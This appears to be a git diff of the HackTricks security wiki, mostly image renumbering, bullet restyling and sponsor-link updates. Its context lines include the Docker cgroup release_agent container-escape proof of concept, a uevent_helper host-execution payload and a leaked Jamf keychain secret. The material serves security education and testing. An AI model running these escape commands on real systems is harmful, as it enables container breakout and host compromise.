@@ -34,15 +34,15 @@ AppArmor is a **kernel enhancement designed to restrict the resources available
 
 There are two operational modes for AppArmor profiles:
 
-- **Enforcement Mode**: This mode actively enforces the policies defined within the profile, blocking actions that violate these policies and logging any attempts to breach them through systems like syslog or auditd.
-- **Complain Mode**: Unlike enforcement mode, complain mode does not block actions that go against the profile's policies. Instead, it logs these attempts as policy violations without enforcing restrictions.
+* **Enforcement Mode**: This mode actively enforces the policies defined within the profile, blocking actions that violate these policies and logging any attempts to breach them through systems like syslog or auditd.
+* **Complain Mode**: Unlike enforcement mode, complain mode does not block actions that go against the profile's policies. Instead, it logs these attempts as policy violations without enforcing restrictions.
 
 ### Components of AppArmor
 
-- **Kernel Module**: Responsible for the enforcement of policies.
-- **Policies**: Specify the rules and restrictions for program behavior and resource access.
-- **Parser**: Loads policies into the kernel for enforcement or reporting.
-- **Utilities**: These are user-mode programs that provide an interface for interacting with and managing AppArmor.
+* **Kernel Module**: Responsible for the enforcement of policies.
+* **Policies**: Specify the rules and restrictions for program behavior and resource access.
+* **Parser**: Loads policies into the kernel for enforcement or reporting.
+* **Utilities**: These are user-mode programs that provide an interface for interacting with and managing AppArmor.
 
 ### Profiles path
 
@@ -322,7 +322,7 @@ chmod +x /tmp/test.pl
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -341,7 +341,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/linux-hardening/privilege-escalation/docker-security/cgroups.md b/linux-hardening/privilege-escalation/docker-security/cgroups.md
index 3eec63969..7707b8a3a 100644
--- a/linux-hardening/privilege-escalation/docker-security/cgroups.md
+++ b/linux-hardening/privilege-escalation/docker-security/cgroups.md
@@ -53,15 +53,15 @@ The output structure is as follows:
 
 The filesystem is typically utilized for accessing **cgroups**, diverging from the Unix system call interface traditionally used for kernel interactions. To investigate a shell's cgroup configuration, one should examine the **/proc/self/cgroup** file, which reveals the shell's cgroup. Then, by navigating to the **/sys/fs/cgroup** (or **`/sys/fs/cgroup/unified`**) directory and locating a directory that shares the cgroup's name, one can observe various settings and resource usage information pertinent to the cgroup.
 
-![Cgroup Filesystem](<../../../.gitbook/assets/image (1125).png>)
+![Cgroup Filesystem](<../../../.gitbook/assets/image (1128).png>)
 
 The key interface files for cgroups are prefixed with **cgroup**. The **cgroup.procs** file, which can be viewed with standard commands like cat, lists the processes within the cgroup. Another file, **cgroup.threads**, includes thread information.
 
-![Cgroup Procs](<../../../.gitbook/assets/image (278).png>)
+![Cgroup Procs](<../../../.gitbook/assets/image (281).png>)
 
 Cgroups managing shells typically encompass two controllers that regulate memory usage and process count. To interact with a controller, files bearing the controller's prefix should be consulted. For instance, **pids.current** would be referenced to ascertain the count of threads in the cgroup.
 
-![Cgroup Memory](<../../../.gitbook/assets/image (674).png>)
+![Cgroup Memory](<../../../.gitbook/assets/image (677).png>)
 
 The indication of **max** in a value suggests the absence of a specific limit for the cgroup. However, due to the hierarchical nature of cgroups, limits might be imposed by a cgroup at a lower level in the directory hierarchy.
 
@@ -93,7 +93,7 @@ The **root cgroup** is an exception to these rules, allowing direct process plac
 
 **Monitoring CPU usage** within a cgroup is possible through the `cpu.stat` file, displaying total CPU time consumed, helpful for tracking usage across a service's subprocesses:
 
-<figure><img src="../../../.gitbook/assets/image (905).png" alt=""><figcaption><p>CPU usage statistics as shown in the cpu.stat file</p></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (908).png" alt=""><figcaption><p>CPU usage statistics as shown in the cpu.stat file</p></figcaption></figure>
 
 ## References
 
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
index 7ab788121..9996d5837 100644
--- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
+++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %}
 
 ## Automatic Enumeration & Escape
 
@@ -522,12 +522,12 @@ cat /proc/self/status | grep CapEff
 
 The second technique explained in the post [https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) indicates how you can abuse bind mounts with user namespaces, to affect files inside the host (in that specific case, delete files).
 
-<figure><img src="../../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %}
 
 ## CVEs
 
@@ -664,12 +664,12 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
 * [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket)
 * [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4)
 
-<figure><img src="../../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %}
 
 <details>
 
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
index 4234eddcf..a869bc18e 100644
--- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
+++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,10 +26,9 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
-
-**For further details, refer to the [original blog post](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** This is just a summary:
+**For further details, refer to the** [**original blog post**](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)**.** This is just a summary:
 
 Original PoC:
 
@@ -44,24 +43,24 @@ $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
 The proof of concept (PoC) demonstrates a method to exploit cgroups by creating a `release_agent` file and triggering its invocation to execute arbitrary commands on the container host. Here's a breakdown of the steps involved:
 
 1. **Prepare the Environment:**
-   - A directory `/tmp/cgrp` is created to serve as a mount point for the cgroup.
-   - The RDMA cgroup controller is mounted to this directory. In case of absence of the RDMA controller, it's suggested to use the `memory` cgroup controller as an alternative.
+   * A directory `/tmp/cgrp` is created to serve as a mount point for the cgroup.
+   * The RDMA cgroup controller is mounted to this directory. In case of absence of the RDMA controller, it's suggested to use the `memory` cgroup controller as an alternative.
 
 ```shell
 mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
 ```
 
 2. **Set Up the Child Cgroup:**
-    - A child cgroup named "x" is created within the mounted cgroup directory.
-    - Notifications are enabled for the "x" cgroup by writing 1 to its notify_on_release file.
+   * A child cgroup named "x" is created within the mounted cgroup directory.
+   * Notifications are enabled for the "x" cgroup by writing 1 to its notify\_on\_release file.
 
 ```shell
 echo 1 > /tmp/cgrp/x/notify_on_release
 ```
 
 3. **Configure the Release Agent:**
-    - The path of the container on the host is obtained from the /etc/mtab file.
-    - The release_agent file of the cgroup is then configured to execute a script named /cmd located at the acquired host path.
+   * The path of the container on the host is obtained from the /etc/mtab file.
+   * The release\_agent file of the cgroup is then configured to execute a script named /cmd located at the acquired host path.
 
 ```shell
 host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
@@ -69,7 +68,7 @@ echo "$host_path/cmd" > /tmp/cgrp/release_agent
 ```
 
 4. **Create and Configure the /cmd Script:**
-    - The /cmd script is created inside the container and is configured to execute ps aux, redirecting the output to a file named /output in the container. The full path of /output on the host is specified.
+   * The /cmd script is created inside the container and is configured to execute ps aux, redirecting the output to a file named /output in the container. The full path of /output on the host is specified.
 
 ```shell
 echo '#!/bin/sh' > /cmd
@@ -78,8 +77,8 @@ chmod a+x /cmd
 ```
 
 5. **Trigger the Attack:**
-    - A process is initiated within the "x" child cgroup and is immediately terminated.
-    - This triggers the `release_agent` (the /cmd script), which executes ps aux on the host and writes the output to /output within the container.
+   * A process is initiated within the "x" child cgroup and is immediately terminated.
+   * This triggers the `release_agent` (the /cmd script), which executes ps aux on the host and writes the output to /output within the container.
 
 ```shell
 sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
@@ -87,7 +86,7 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -106,7 +105,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
index 4f8d58a07..f1f30aa70 100644
--- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
+++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../..https:/pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -138,23 +138,23 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
 * Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers.
 *   **Example for Exploitation**: %%%bash
 
-    ### Creates a payload
+    #### Creates a payload
 
     echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
 
-    ### Finds host path from OverlayFS mount for container
+    #### Finds host path from OverlayFS mount for container
 
     host\_path=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
 
-    ### Sets uevent\_helper to malicious helper
+    #### Sets uevent\_helper to malicious helper
 
     echo "$host\_path/evil-helper" > /sys/kernel/uevent\_helper
 
-    ### Triggers a uevent
+    #### Triggers a uevent
 
     echo change > /sys/class/mem/null/uevent
 
-    ### Reads the output
+    #### Reads the output
 
     cat /output %%%
 
@@ -187,7 +187,7 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
 * [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
 * [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
 
-<figure><img src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../..https:/pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md b/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
index 602a4e7f0..af3fbfc57 100644
--- a/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
+++ b/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
@@ -77,7 +77,7 @@ This is useful in containers because **shutting down the process and starting a
 
 To connect to a **Chromium-based browser**, the `chrome://inspect` or `edge://inspect` URLs can be accessed for Chrome or Edge, respectively. By clicking the Configure button, it should be ensured that the **target host and port** are correctly listed. The image shows a Remote Code Execution (RCE) example:
 
-![](<../../.gitbook/assets/image (671).png>)
+![](<../../.gitbook/assets/image (674).png>)
 
 Using the **command line** you can connect to a debugger/inspector with:
 
diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
index a35a0bde1..74e0cc6bd 100644
--- a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
+++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
@@ -217,11 +217,11 @@ cat /sys/class/graphics/fb0/virtual_size
 
 To **open** the **raw image** you can use **GIMP**, select the \*\*`screen.raw` \*\* file and select as file type **Raw image data**:
 
-![](<../../../.gitbook/assets/image (460).png>)
+![](<../../../.gitbook/assets/image (463).png>)
 
 Then modify the Width and Height to the ones used on the screen and check different Image Types (and select the one that shows better the screen):
 
-![](<../../../.gitbook/assets/image (314).png>)
+![](<../../../.gitbook/assets/image (317).png>)
 
 ## Root Group
 
diff --git a/linux-hardening/useful-linux-commands.md b/linux-hardening/useful-linux-commands.md
index 9e6cd7b60..f249a3eac 100644
--- a/linux-hardening/useful-linux-commands.md
+++ b/linux-hardening/useful-linux-commands.md
@@ -1,6 +1,6 @@
 # Useful Linux Commands
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -143,7 +143,7 @@ sudo chattr -i file.txt #Remove the bit so you can delete it
 7z l file.zip
 ```
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -349,7 +349,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/macos-hardening/macos-auto-start-locations.md b/macos-hardening/macos-auto-start-locations.md
index b0551360d..2736d212c 100644
--- a/macos-hardening/macos-auto-start-locations.md
+++ b/macos-hardening/macos-auto-start-locations.md
@@ -202,7 +202,7 @@ In **`~/Library/Preferences`** are store the preferences of the user in the Appl
 
 For example, the Terminal can execute a command in the Startup:
 
-<figure><img src="../.gitbook/assets/image (1145).png" alt="" width="495"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1148).png" alt="" width="495"><figcaption></figcaption></figure>
 
 This config is reflected in the file **`~/Library/Preferences/com.apple.Terminal.plist`** like this:
 
@@ -494,7 +494,7 @@ The iTerm2 preferences located in **`~/Library/Preferences/com.googlecode.iterm2
 
 This setting can be configured in the iTerm2 settings:
 
-<figure><img src="../.gitbook/assets/image (34).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (37).png" alt="" width="563"><figcaption></figcaption></figure>
 
 And the command is reflected in the preferences:
 
@@ -863,7 +863,7 @@ mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"
 
 Then, open the `Folder Actions Setup` app, select the **folder you would like to watch** and select in your case **`folder.scpt`** (in my case I called it output2.scp):
 
-<figure><img src="../.gitbook/assets/image (36).png" alt="" width="297"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (39).png" alt="" width="297"><figcaption></figcaption></figure>
 
 Now, if you open that folder with **Finder**, your script will be executed.
 
@@ -875,7 +875,7 @@ Now, lets try to prepare this persistence without GUI access:
    * `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp`
 2. **Remove** the Folder Actions you just set:
 
-<figure><img src="../.gitbook/assets/image (37).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (40).png" alt=""><figcaption></figcaption></figure>
 
 Now that we have an empty environment
 
@@ -1049,7 +1049,7 @@ Writeup: [https://posts.specterops.io/saving-your-access-d562bf5bf90b](https://p
 * `~/Library/Screen Savers`
   * **Trigger**: Select the screen saver
 
-<figure><img src="../.gitbook/assets/image (35).png" alt="" width="375"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (38).png" alt="" width="375"><figcaption></figcaption></figure>
 
 #### Description & Exploit
 
diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md
index 5054102cf..b5e647807 100644
--- a/macos-hardening/macos-red-teaming/README.md
+++ b/macos-hardening/macos-red-teaming/README.md
@@ -51,11 +51,11 @@ You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/J
 
 Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form:
 
-![](<../../.gitbook/assets/image (104).png>)
+![](<../../.gitbook/assets/image (107).png>)
 
 #### JAMF device Authentication
 
-<figure><img src="../../.gitbook/assets/image (164).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (167).png" alt=""><figcaption></figcaption></figure>
 
 The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
 Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
@@ -102,7 +102,7 @@ With this information, **create a VM** with the **stolen** Hardware **UUID** and
 
 #### Secrets stealing
 
-<figure><img src="../../.gitbook/assets/image (1022).png" alt=""><figcaption><p>a</p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1025).png" alt=""><figcaption><p>a</p></figcaption></figure>
 
 You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**.
 
@@ -211,7 +211,7 @@ MacOS Red Teaming is different from a regular Windows Red Teaming as usually **M
 
 When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed:
 
-<figure><img src="../../.gitbook/assets/image (223).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (226).png" alt=""><figcaption></figcaption></figure>
 
 ## References
 
diff --git a/macos-hardening/macos-red-teaming/macos-keychain.md b/macos-hardening/macos-red-teaming/macos-keychain.md
index bc8071679..fff6196eb 100644
--- a/macos-hardening/macos-red-teaming/macos-keychain.md
+++ b/macos-hardening/macos-red-teaming/macos-keychain.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Main Keychains
 
@@ -49,7 +49,7 @@ Each entry in the keychain is governed by **Access Control Lists (ACLs)** which
 
 The ACLs are further accompanied by a **list of trusted applications** that can perform these actions without prompting. This could be:
 
-* &#x20;**N`il`** (no authorization required, **everyone is trusted**)
+* **N`il`** (no authorization required, **everyone is trusted**)
 * An **empty** list (**nobody** is trusted)
 * **List** of specific **applications**.
 
@@ -109,7 +109,7 @@ List and get **info** about each keychain entry:
 
 Get **ACLs** of each entry:
 
-* With the API **`SecAccessCopyACLList`** you can get the **ACL for the keychain item**, and it will return a list of ACLs (like `ACLAuhtorizationExportClear` and the others previously mentioned)  where each list has:
+* With the API **`SecAccessCopyACLList`** you can get the **ACL for the keychain item**, and it will return a list of ACLs (like `ACLAuhtorizationExportClear` and the others previously mentioned) where each list has:
   * Description
   * **Trusted Application List**. This could be:
     * An app: /Applications/Slack.app
@@ -119,7 +119,7 @@ Get **ACLs** of each entry:
 Export the data:
 
 * The API **`SecKeychainItemCopyContent`** gets the plaintext
-* The API  **`SecItemExport`** exports the keys and certificates but might have to set passwords to export the content encrypted
+* The API **`SecItemExport`** exports the keys and certificates but might have to set passwords to export the content encrypted
 
 And these are the **requirements** to be able to **export a secret without a prompt**:
 
@@ -150,7 +150,7 @@ If **apple** is indicated in the **partitionID**, you could access it with **`os
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -169,7 +169,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-red-teaming/macos-mdm/README.md b/macos-hardening/macos-red-teaming/macos-mdm/README.md
index 4bc59914f..af81d9ef6 100644
--- a/macos-hardening/macos-red-teaming/macos-mdm/README.md
+++ b/macos-hardening/macos-red-teaming/macos-mdm/README.md
@@ -104,7 +104,7 @@ Apple devices manufactured after 2010 generally have **12-character alphanumeric
 6. Profile installation (Device) a. incl. MDM, SCEP and root CA payloads
 7. MDM command issuance (Device)
 
-![](<../../../.gitbook/assets/image (691).png>)
+![](<../../../.gitbook/assets/image (694).png>)
 
